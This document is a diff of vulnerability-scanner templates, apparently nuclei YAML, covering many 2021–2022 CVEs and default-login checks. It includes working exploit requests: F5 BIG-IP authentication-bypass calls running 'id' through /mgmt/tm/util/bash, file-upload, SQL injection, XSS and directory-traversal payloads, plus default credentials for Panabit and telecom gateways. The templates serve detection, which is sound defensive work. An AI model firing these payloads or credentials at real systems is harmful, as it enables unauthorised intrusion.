|||
id: CVE-2021-21881
|
||||
|
||||
info:
|
||||
name: Lantronix PremierWave 2050 - Remote Code Execution
|
||||
name: Lantronix PremierWave 2050 8.9.0.0R4 - Remote Command Injection
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: An OS command injection vulnerability exists in the Web Manager Wireless Network Scanner functionality of Lantronix PremierWave 2050 8.9.0.0R4. A specially-crafted HTTP request can lead to command
|
||||
execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.
|
||||
description: Lantronix PremierWave 2050 8.9.0.0R4 contains an OS command injection vulnerability. A specially-crafted HTTP request can lead to command in the Web Manager Wireless Network Scanner. An attacker can make an authenticated HTTP request to trigger this vulnerability.
|
||||
reference:
|
||||
- https://talosintelligence.com/vulnerability_reports/TALOS-2021-1325
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-21881
|
||||
|
@ -39,3 +38,5 @@ requests:
|
|||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
|
||||
|
||||
# Enhanced by mp on 2022/05/05
|
||||
|
|
|
@ -1,12 +1,13 @@
|
|||
id: CVE-2021-21972
|
||||
|
||||
info:
|
||||
name: VMware vCenter Unauthenticated RCE
|
||||
name: VMware vSphere Client (HTML5) - Remote Code Execution
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
description: The vulnerability allows unauthenticated remote attackers to upload files leading to remote code execution (RCE). This templates only detects the plugin.
|
||||
description: "VMware vCenter vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2)."
|
||||
reference:
|
||||
- https://swarm.ptsecurity.com/unauth-rce-vmware/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-21972
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
@ -32,3 +33,5 @@ requests:
|
|||
regex:
|
||||
- "(Install|Config) Final Progress"
|
||||
part: body
|
||||
|
||||
# Enhanced by mp on 2022/05/05
|
||||
|
|
|
@ -1,16 +1,16 @@
|
|||
id: CVE-2021-21978
|
||||
|
||||
info:
|
||||
name: VMware View Planner Unauthenticated RCE
|
||||
name: VMware View Planner <4.6 SP1- Remote Code Execution
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
description: |
|
||||
This template detects an VMware View Planner 4.x prior to 4.6 Security Patch 1 contains a remote code execution vulnerability.
|
||||
Improper input validation and lack of authorization leading to arbitrary file upload in logupload web application.
|
||||
VMware View Planner 4.x prior to 4.6 Security Patch 1 contains a remote code execution vulnerability due to improper input validation and lack of authorization leading to arbitrary file upload in logupload web application.
|
||||
An unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted
|
||||
file leading to remote code execution within the logupload container.
|
||||
reference:
|
||||
- https://twitter.com/osama_hroot/status/1367258907601698816
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-21978
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
@ -48,3 +48,5 @@ requests:
|
|||
- type: dsl
|
||||
dsl:
|
||||
- "len(body) == 28" # length of "\nFile uploaded successfully."
|
||||
|
||||
# Enhanced by mp on 2022/05/05
|
||||
|
|
|
@ -1,15 +1,15 @@
|
|||
id: CVE-2021-21985
|
||||
|
||||
info:
|
||||
name: VMware vSphere Client (HTML5) RCE
|
||||
name: VMware vSphere Client (HTML5) - Remote Code Execution
|
||||
author: D0rkerDevil
|
||||
severity: critical
|
||||
description: |
|
||||
The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-21985
|
||||
- https://www.vmware.com/security/advisories/VMSA-2021-0010.html
|
||||
- https://github.com/alt3kx/CVE-2021-21985_PoC
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-21985
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
@ -32,3 +32,5 @@ requests:
|
|||
words:
|
||||
- '{"result":{"isDisconnected":'
|
||||
part: body
|
||||
|
||||
# Enhanced by mp on 2022/05/05
|
||||
|
|
|
@ -1,15 +1,15 @@
|
|||
id: CVE-2021-22005
|
||||
|
||||
info:
|
||||
name: VMware vCenter Server file upload vulnerability
|
||||
name: VMware vCenter Server - Arbitrary File Upload
|
||||
author: PR3R00T
|
||||
severity: critical
|
||||
description: The vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3
|
||||
base score of 9.8.
|
||||
description: VMware vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.
|
||||
reference:
|
||||
- https://kb.vmware.com/s/article/85717
|
||||
- https://www.vmware.com/security/advisories/VMSA-2021-0020.html
|
||||
- https://core.vmware.com/vmsa-2021-0020-questions-answers-faq
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-22005
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
@ -39,3 +39,5 @@ requests:
|
|||
- "contains(body_1, 'VMware vSphere')"
|
||||
- "content_length_2 == 0"
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/05/05
|
||||
|
|
|
@ -1,12 +1,10 @@
|
|||
id: CVE-2021-22205
|
||||
|
||||
info:
|
||||
name: Fingerprinting GitLab CE/EE Unauthenticated RCE using ExifTool - Passive Detection
|
||||
name: GitLab CE/EE - Remote Code Execution
|
||||
author: GitLab Red Team
|
||||
severity: critical
|
||||
description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command
|
||||
execution. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-<hash>.css file in the header for unauthenticated
|
||||
requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below.
|
||||
description: GitLab CE/EE starting from 11.9 does not properly validate image files that were passed to a file parser, resulting in a remote command execution vulnerability. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-<hash>.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below.
|
||||
reference:
|
||||
- https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-research/cve-2021-22205-hash-generator
|
||||
- https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-operations/-/issues/196
|
||||
|
@ -130,3 +128,5 @@ requests:
|
|||
group: 1
|
||||
regex:
|
||||
- '(?:application-)(\S{64})(?:\.css)'
|
||||
|
||||
# Enhanced by mp on 2022/05/05
|
||||
|
|
|
@ -1,10 +1,10 @@
|
|||
id: CVE-2021-22986
|
||||
|
||||
info:
|
||||
name: F5 BIG-IP iControl REST Unauthenticated Remote Command Execution
|
||||
name: F5 BIG-IP iControl REST - Remote Command Execution
|
||||
author: rootxharsh,iamnoooob
|
||||
severity: critical
|
||||
description: The F5 BIG-IP iControl REST interface has an unauthenticated remote command execution vulnerability.
|
||||
description: F5 BIG-IP iControl REST interface is susceptible to an unauthenticated remote command execution vulnerability.
|
||||
reference:
|
||||
- https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986
|
||||
- https://support.f5.com/csp/article/K03009991
|
||||
|
@ -24,7 +24,7 @@ requests:
|
|||
Authorization: Basic YWRtaW46
|
||||
Content-Type: application/json
|
||||
Cookie: BIGIPAuthCookie=1234
|
||||
Connection: close
|
||||
|
||||
{"username":"admin","userReference":{},"loginReference":{"link":"http://localhost/mgmt/shared/gossip"}}
|
||||
- |
|
||||
POST /mgmt/tm/util/bash HTTP/1.1
|
||||
|
@ -32,8 +32,9 @@ requests:
|
|||
Accept-Language: en
|
||||
X-F5-Auth-Token: {{token}}
|
||||
Content-Type: application/json
|
||||
Connection: close
|
||||
|
||||
{"command":"run","utilCmdArgs":"-c id"}
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
|
@ -42,6 +43,7 @@ requests:
|
|||
group: 1
|
||||
regex:
|
||||
- "([A-Z0-9]{26})"
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
|
@ -55,4 +57,4 @@ requests:
|
|||
- "uid="
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/04/13
|
||||
# Enhanced by mp on 2022/05/05
|
||||
|
|
|
@ -1,13 +1,11 @@
|
|||
id: CVE-2021-24285
|
||||
|
||||
info:
|
||||
name: Car Seller - Auto Classifieds Script WordPress plugin SQLI
|
||||
name: WordPress Car Seller - Auto Classifieds Script - SQL Injection
|
||||
author: ShreyaPohekar
|
||||
severity: critical
|
||||
description: The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitise, validate
|
||||
or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL Injection issue.
|
||||
description: "The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitize, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL injection issue."
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24285
|
||||
- https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/
|
||||
- https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162
|
||||
classification:
|
||||
|
@ -36,3 +34,5 @@ requests:
|
|||
words:
|
||||
- "qzvvqhWAAlCfTiMDmAoqzkTpJEzPwVFSaIpfAfdfTinrMqqxkq"
|
||||
part: body
|
||||
|
||||
# Enhanced by mp on 2022/05/05
|
||||
|
|
|
@ -1,13 +1,13 @@
|
|||
id: CVE-2021-24472
|
||||
|
||||
info:
|
||||
name: Onair2 < 3.9.9.2 & KenthaRadio < 2.0.2 - Unauthenticated RFI and SSRF
|
||||
name: Onair2 < 3.9.9.2 & KenthaRadio < 2.0.2 - Remote File Inclusion/Server-Side Request Forgery
|
||||
author: Suman_Kar
|
||||
severity: critical
|
||||
description: The theme and plugin have exposed proxy functionality to unauthenticated users, sending requests to this proxy functionality will have the web server fetch and display the content from any URI, this
|
||||
would allow for SSRF (Server Side Request Forgery) and RFI (Remote File Inclusion) vulnerabilities on the website.
|
||||
description: Onair2 < 3.9.9.2 and KenthaRadio < 2.0.2 have exposed proxy functionality to unauthenticated users. Sending requests to this proxy functionality will have the web server fetch and display the content from any URI, allowing remote file inclusion and server-side request forgery.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/17591ac5-88fa-4cae-a61a-4dcf5dc0b72a
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24472
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
@ -32,3 +32,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/05/05
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2021-27358
|
|||
|
||||
info:
|
||||
name: Grafana Unauthenticated Snapshot Creation
|
||||
author: pdteam
|
||||
author: pdteam,bing0o
|
||||
severity: high
|
||||
description: Grafana 6.7.3 through 7.4.1 snapshot functionality can allow an unauthenticated remote attacker to trigger a Denial of Service via a remote API call if a commonly used configuration is set.
|
||||
reference:
|
||||
|
@ -13,6 +13,7 @@ info:
|
|||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2021-27358
|
||||
cwe-id: CWE-306
|
||||
tags: cve,cve2021,grafana,unauth
|
||||
|
||||
requests:
|
||||
|
@ -20,7 +21,6 @@ requests:
|
|||
- |
|
||||
POST /api/snapshots HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: application/json
|
||||
Content-Type: application/json
|
||||
|
||||
{"dashboard": {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}
|
||||
|
|
|
@ -7,12 +7,11 @@ info:
|
|||
description: A directory traversal vulnerability in Ivanti Avalanche allows remote unauthenticated user to access files that reside outside the 'image' folder
|
||||
reference:
|
||||
- https://ssd-disclosure.com/ssd-advisory-ivanti-avalanche-directory-traversal/
|
||||
tags: cve,cve2021,avalanche,traversal
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.50
|
||||
cve-id: CVE-2021-30497
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2021,avalanche,traversal
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -0,0 +1,43 @@
|
|||
id: CVE-2021-37416
|
||||
|
||||
info:
|
||||
name: Zoho ManageEngine ADSelfService Plus - Reflected XSS
|
||||
author: edoardottt
|
||||
severity: medium
|
||||
description: Zoho ManageEngine ADSelfService Plus version 6103 and prior is vulnerable to reflected XSS on the loadframe page.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2021-37416
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
shodan-query: http.title:"ManageEngine"
|
||||
verified: true
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-37416
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37416
|
||||
- https://blog.stmcyber.com/vulns/cve-2021-37416/
|
||||
tags: cve,cve2021,zoho,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "></iframe><script>alert(1)</script>"
|
||||
- "adsf/js/"
|
||||
condition: and
|
|
@ -8,12 +8,12 @@ info:
|
|||
remediation: Fixed in version 2.7.12
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/27b64412-33a4-462c-bc45-f81697e4fe42
|
||||
tags: cve,cve2022,wordpress,xss
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2022-0288
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2022,wordpress,xss
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
|
|
|
@ -0,0 +1,36 @@
|
|||
id: CVE-2022-0540
|
||||
|
||||
info:
|
||||
name: Atlassian Jira - Authentication bypass in Seraph
|
||||
author: DhiyaneshDK
|
||||
severity: critical
|
||||
description: |
|
||||
A vulnerability in Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.
|
||||
reference:
|
||||
- https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0540
|
||||
- https://confluence.atlassian.com/display/JIRA/Jira+Security+Advisory+2022-04-20
|
||||
metadata:
|
||||
shodan-query: http.component:"Atlassian Jira"
|
||||
tags: cve,cve2022,atlassian,jira,exposure,auth-bypass
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2022-0540
|
||||
cwe-id: CWE-287
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/InsightPluginShowGeneralConfiguration.jspa;'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'General Insight Configuration'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,45 @@
|
|||
id: CVE-2022-1040
|
||||
|
||||
info:
|
||||
name: Sophos Firewall - RCE
|
||||
author: For3stCo1d
|
||||
severity: critical
|
||||
description: |
|
||||
An authentication bypass vulnerability in the User Portal and Webadmin allows a remote attacker to execute code in Sophos Firewall version v18.5 MR3 and older.
|
||||
reference:
|
||||
- https://github.com/killvxk/CVE-2022-1040
|
||||
- https://github.com/CronUp/Vulnerabilidades/blob/main/CVE-2022-1040_checker
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-1040
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-1040
|
||||
cwe-id: CWE-287
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.title:"Sophos"
|
||||
tags: cve,cve2022,sophos,firewall,auth-bypass
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/userportal/Controller?mode=8700&operation=1&datagrid=179&json={\"🦞\":\"test\"}"
|
||||
|
||||
headers:
|
||||
X-Requested-With: "XMLHttpRequest"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "{\"status\":\"Session Expired\"}"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "Server: xxxx"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,49 @@
|
|||
id: CVE-2022-1388
|
||||
|
||||
info:
|
||||
name: F5 BIG-IP iControl REST Auth Bypass RCE
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
description: |
|
||||
This vulnerability may allow an unauthenticated attacker
|
||||
with network access to the BIG-IP system through the management
|
||||
port and/or self IP addresses to execute arbitrary system commands,
|
||||
create or delete files, or disable services. There is no data plane
|
||||
exposure; this is a control plane issue only.
|
||||
reference:
|
||||
- https://twitter.com/GossiTheDog/status/1523566937414193153
|
||||
- https://support.f5.com/csp/article/K23605346
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2022-1388
|
||||
cwe-id: CWE-306
|
||||
metadata:
|
||||
shodan-query: http.title:"BIG-IP®-+Redirect" +"Server"
|
||||
verified: true
|
||||
tags: bigip,cve,cve2022,rce,mirai
|
||||
|
||||
variables:
|
||||
auth: "admin:"
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /mgmt/tm/util/bash HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Connection: keep-alive, X-F5-Auth-Token
|
||||
X-F5-Auth-Token: a
|
||||
Authorization: Basic {{base64(auth)}}
|
||||
Content-Type: application/json
|
||||
|
||||
{
|
||||
"command": "run",
|
||||
"utilCmdArgs": "-c id"
|
||||
}
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "commandResult"
|
||||
- "uid="
|
||||
condition: and
|
|
@ -0,0 +1,33 @@
|
|||
id: CVE-2022-1439
|
||||
|
||||
info:
|
||||
name: Microweber Reflected Cross-Site Scripting
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: Reflected XSS in microweber/microweber prior to 1.2.15. Execute Arbitrary JavaScript as the attacked user. It's the only payload I found working, you might need to press "tab" but there is probably a paylaod that runs without user interaction.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-1439
|
||||
- https://huntr.dev/bounties/86f6a762-0f3d-443d-a676-20f8496907e0/
|
||||
classification:
|
||||
cve-id: CVE-2022-1439
|
||||
metadata:
|
||||
shodan-query: http.favicon.hash:780351152
|
||||
tags: cve,cve2022,microweber,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/module/?module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url={{BaseURL}}'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<div class='x module module-'onmouseover=alert(document.domain) '"
|
||||
- "parent-module-id"
|
||||
condition: and
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2022-26233
|
||||
|
||||
info:
|
||||
name: Barco Control Room Management Suite - Directory Traversal
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: Barco Control Room Management through Suite 2.9 Build 0275 was discovered to be vulnerable to directory traversal, allowing attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring.
|
||||
reference:
|
||||
- https://0day.today/exploit/37579
|
||||
- https://www.cvedetails.com/cve/CVE-2022-26233
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2022-26233
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2022,barco,lfi
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |+
|
||||
GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
unsafe: true
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "bit app support"
|
||||
- "fonts"
|
||||
- "extensions"
|
||||
condition: and
|
|
@ -8,6 +8,8 @@ info:
|
|||
reference:
|
||||
- https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/
|
||||
- https://github.com/h1ei1/POC/tree/main/CVE-2022-26352
|
||||
classification:
|
||||
cve-id: CVE-2022-26352
|
||||
tags: cve,cve2022,rce,dotcms
|
||||
|
||||
requests:
|
||||
|
|
|
@ -0,0 +1,41 @@
|
|||
id: CVE-2022-29548
|
||||
|
||||
info:
|
||||
name: WSO2 Management Console - Reflected XSS
|
||||
author: edoardottt
|
||||
severity: medium
|
||||
description: |
|
||||
A reflected XSS issue exists in the Management Console of several WSO2 products.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-29548
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29548
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2022-29548
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: true
|
||||
google-dork: inurl:"carbon/admin/login"
|
||||
tags: cve,cve2022,wso2,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "CARBON.showWarningDialog('???');alert(document.domain)//???"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,36 @@
|
|||
id: panabit-ixcache-default-login
|
||||
|
||||
info:
|
||||
name: Panabit iXCache Default Login
|
||||
author: ritikchaddha
|
||||
severity: high
|
||||
reference:
|
||||
- http://forum.panabit.com/thread-10830-1-1.html
|
||||
tags: ixcache,default-login,panabit
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /login/userverify.cgi HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
username={{username}}&password={{password}}
|
||||
|
||||
payloads:
|
||||
username:
|
||||
- admin
|
||||
password:
|
||||
- ixcache
|
||||
attack: pitchfork
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "URL=/cgi-bin/monitor.cgi"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,37 @@
|
|||
id: telecom-gateway-default-login
|
||||
|
||||
info:
|
||||
name: Telecom Gateway Default Login
|
||||
author: ritikchaddha
|
||||
severity: high
|
||||
tags: telecom,default-login,gateway
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /manager/login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
Name={{username}}&Pass={{password}}
|
||||
|
||||
attack: pitchfork
|
||||
payloads:
|
||||
username:
|
||||
- admin
|
||||
password:
|
||||
- admin
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<title>电信网关服务器管理后台</title>"
|
||||
- "index-shang.php"
|
||||
- "di.php"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -2,16 +2,19 @@ id: panabit-default-login
|
|||
|
||||
info:
|
||||
name: Panabit Gateway Default Login
|
||||
author: pikpikcu
|
||||
author: pikpikcu,ritikchaddha
|
||||
severity: high
|
||||
description: Panabit Gateway default credentials were discovered.
|
||||
reference:
|
||||
- https://max.book118.com/html/2017/0623/117514590.shtm
|
||||
- https://en.panabit.com/wp-content/uploads/Panabit-Intelligent-Application-Gateway-04072020.pdf
|
||||
- https://topic.alibabacloud.com/a/panabit-monitoring-installation-tutorial_8_8_20054193.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
|
||||
cvss-score: 5.8
|
||||
cwe-id: CWE-522
|
||||
metadata:
|
||||
fofa-query: app="Panabit-智能网关"
|
||||
tags: panabit,default-login
|
||||
|
||||
requests:
|
||||
|
@ -26,31 +29,36 @@ requests:
|
|||
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
|
||||
|
||||
------WebKitFormBoundaryAjZMsILtbrBp8VbC
|
||||
Content-Disposition: form-data; name="{{username}}"
|
||||
Content-Disposition: form-data; name="username"
|
||||
|
||||
admin
|
||||
{{username}}
|
||||
------WebKitFormBoundaryAjZMsILtbrBp8VbC
|
||||
Content-Disposition: form-data; name="{{password}}"
|
||||
Content-Disposition: form-data; name="password"
|
||||
|
||||
panabit
|
||||
{{password}}
|
||||
------WebKitFormBoundaryAjZMsILtbrBp8VbC--
|
||||
|
||||
payloads:
|
||||
username:
|
||||
- username
|
||||
- admin
|
||||
password:
|
||||
- password
|
||||
- panabit
|
||||
attack: pitchfork
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<META HTTP-EQUIV=REFRESH CONTENT="0;URL=/index.htm">'
|
||||
- 'urn:schemas-microsoft-com:vml'
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "paonline_admin"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
|
@ -0,0 +1,31 @@
|
|||
id: bigip-icontrol-rest
|
||||
|
||||
info:
|
||||
name: F5 BIG-IP iControl REST Panel
|
||||
author: MrCl0wnLab
|
||||
severity: info
|
||||
description: |
|
||||
Undisclosed requests may bypass iControl REST authentication.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-1388
|
||||
- https://support.f5.com/csp/article/K23605346
|
||||
- https://clouddocs.f5.com/products/big-iq/mgmt-api/v5.4/ApiReferences/bigiq_api_ref/r_auth_login.html
|
||||
metadata:
|
||||
shodan-query: http.title:"BIG-IP®-+Redirect" +"Server"
|
||||
tags: panel,bigip,f5
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/mgmt/shared/authn/login"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
